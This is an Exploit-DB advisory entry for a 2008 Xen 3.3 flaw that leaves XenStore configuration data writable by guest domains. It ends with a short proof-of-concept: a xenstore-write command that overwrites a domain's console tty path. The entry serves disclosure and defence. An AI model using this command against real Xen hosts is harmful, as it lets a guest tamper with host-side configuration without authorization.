Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage

EDB-ID:

32446




Platform:

Linux

Date:

2008-09-30


source: https://www.securityfocus.com/bid/31499/info

Xen is prone to a vulnerability that results in configuration information being stored in a location that is writable by guest domains.

UPDATE (December 19, 2008): The initial proposed patches did not resolve this issue.

Xen 3.3 is vulnerable; other versions may also be affected. 

#yum install xen
# xenstore-write /local/domain/GUEST-DOMID/console/tty /i/am/the/evil/guest